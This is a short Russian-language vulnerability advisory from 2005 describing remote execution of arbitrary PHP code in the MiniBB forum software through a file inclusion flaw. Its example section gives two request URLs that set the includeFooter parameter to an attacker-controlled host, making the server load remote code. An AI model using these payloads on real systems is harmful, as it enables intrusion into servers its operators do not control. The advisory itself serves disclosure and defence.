Удаленное выполнение произвольного php кода в MiniBB

Дата публикации:
18.08.2005
Всего просмотров:
2834
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: MiniBB

Описание: Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.

Пример/Эксплоит:

 
http://[target]/[path_to_minibb]/index.php?includeFooter=http://[attacker]
http://[target]/[path_to_minibb]/bb_admin.php?includeFooter=ht tp://[attacker]

URL производителя: http://www.minibb.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: MiniBB php file inclusion

или введите имя

CAPTCHA